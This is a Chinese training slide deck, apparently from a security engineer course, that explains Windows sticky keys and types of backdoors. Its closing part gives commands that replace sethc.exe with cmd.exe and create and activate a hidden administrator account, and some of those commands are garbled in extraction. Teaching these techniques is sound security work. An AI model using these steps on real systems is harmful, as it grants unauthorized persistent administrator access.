利用shift五次粘滞键建立系统永久后门

《利用shift五次粘滞键建立系统永久后门》由会员上传分享，免费在线阅读，更多相关内容在教育资源-天天文库。

1、利用Shift五次粘滞键建立系统永久后门功能介绍Windows中的粘滞键是专为同时按下两个或多个键有困难的人设计的。粘滞键的主要功能是方便Shift、Ctrl、Alt与其他键的组合使用。在我们使用热键时，例如“CTRL+C”，用粘滞键就可以一次只按一个键来完成复制的功能。启动粘滞键可通过单击“开始→设置→控制面板→辅助功能选项”，在“键盘”选项卡下选中“使用粘滞键”来启动。在开启粘滞键的时候，任务栏右边的系统托盘区会出现粘滞键图标。如果想关闭粘滞键，只需将“使用粘滞键”前的钩消除就可以。系统后门后门程序一

2、般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。后门的定义后门程序又称特洛依木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。后门是一种登录系统的方法，它不仅绕过系统已有的安全设置，而且

3、还能挫败系统上各种增强的安全设置。后门的类型后门包括从简单到奇特，有很多的类型。简单的后门可能只是建立一个新的账号，或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的安全认证而对系统有完全存取权。例如一个login程序，你当输入特定的密码时，你就能以管理员的权限来存取系统。后门的类型二后门能相互关联，而且这个技术被许多黑客所使用。例如，黑客可能使用密码破解一个或多个账号密码，黑客可能会建立一个或多个账号。一个黑客可以存取这个系统，黑客可能使用一些技术或利用系统的某个漏洞来提升权限。黑客可能

4、会对系统的配置文件进行小部分的修改，以降低系统的防卫性能。也可能会安装一个木马程序，使系统打开一个安全漏洞，以利于黑客完全掌握系统。后门的分类网页后门此类后门程序一般都是服务器上正常的web服务来构造自己的连接方式，比如现在非常流行的ASP、cgi脚本后门等。较为流行的有海洋顶瑞、一句话后门。后门的分类线程插入后门利用系统自身的某个服务或者进程，将后门程序插入到其中。例如有段时间闹的比较火的svch0st.exe,svchost.exe植入。后门的分类扩展后门所谓的“扩展”，是指在功能上有大的提升，比普通

5、的单一功能的后门有很强的使用性，这种后门本身就相当于一个小的安全工具包，能实现非常多的常驻见安全功能，有段时间调试出来360软件后门，暴风影音后门等。后门的分类应用程序后门利用应用程序的一些自身缺陷，而编写出来的后门，通过原文件替换的方式，将加入后门的应用程序进行提供下载服务。最近的Putty后门就是其中的一个模式。后门的弱点一般的后门都不能很好的隐蔽，因为他们都要进行通信，通过抓包工具，就能获得相应的后门程序，如果是C/S的模式，服务端和客户端都极易被人发现和控制。什么样的后门才是最好的后门系统级的后门

6、才是最好的后门，因为他不易被发现，利用系统的漏洞来利用，通过将原系统文件替换，一般不去检查对应文件大小或者原文件位置比对的话，很难被发现。Shift5次粘滞键后门制作将C盘windows目录下面的system32文件里面的sethc.exe应用程序进行转移，并生成sethc.exe.bak文件。并将cmd.exe拷贝覆盖sethc.exe执行命令如下：C:cdwindowssystem32movesethc.exesethc.exe.bakcopycmd.exesethc.exe命令执行成功Shift

7、5次粘滞键执行成功执行命令操作netuser查看用户列表执行命令操作进入DOS窗口输入如下命令，增加用户名为jakcson的用户密码为123456netuserjakcson123456/add执行命令操作进入DOS窗口输入如下命令：将jackson附属administrators组属性netlocalgroupadministratorsjackson/add执行命令操作进入DOS窗口输入如下命令：netuserJackson/active:yes验证过程验证过程验证为管理员权限THANKS!工信部教育

8、与考试中心网络信息安全工程师高级职业教育项目组www.nsace.org.cn